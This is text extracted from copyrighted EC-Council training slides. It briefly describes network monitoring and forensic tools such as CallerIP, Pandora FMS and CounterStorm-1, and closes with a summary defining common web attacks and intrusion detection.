http://www.callerippro.com/
CallerIP helps the user to see when someone has connected to your
computer and can report the IP address
It also runs a trace on that IP address
• It offers real time connection monitoring
• It identifies the country of origin for all connections made to
your machine
• It provides Worldwide Whois reports for any monitored
connection
Features:
- 91. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
http://www.whois.net/
Whois.net is an online tool for gaining information about any site
- 92. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Pandora FMS
http://pandorafms.org/
Pandora FMS is a monitoring Open Source software
• It watches your systems and applications
• It allows you to know the status of any element of those systems
Features
• Defacement in the website
• If the network’s interface is down
• Memory leak in the server application
Pandora FMS detects :
- 94. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
CounterStorm-1: Defense Against
Known, Zero Day, and Targeted Attacks
The CounterStorm-1 suite of network security
appliances offers the most effective defense against
known, Zero Day, and Targeted Attacks
It automatically neutralizes attacks within seconds,
preventing costly and widespread damage
It does not require signatures, CounterStorm-1
accurately detects attacks in all IP-traffic (TCP, UDP,
and ICMP)
It recognizes current attacks and automatically
adjusts to future threats
http://www.counterstorm.com
- 95. EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Summary
Cross Site Scripting (XSS or CSS) is considered as an application layer hacking technique
SQL Injection means passing SQL code into an application that was not created by the
developer
Cookie Poisoning is the process of tampering with the value of cookies
The source, nature, and time of the attack can be determined by analyzing log files of the
compromised system
FTP server vulnerabilities allow an attacker to directly compromise the system hosting the
FTP server
Web page defacement requires write access privileges in web server root directory
Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity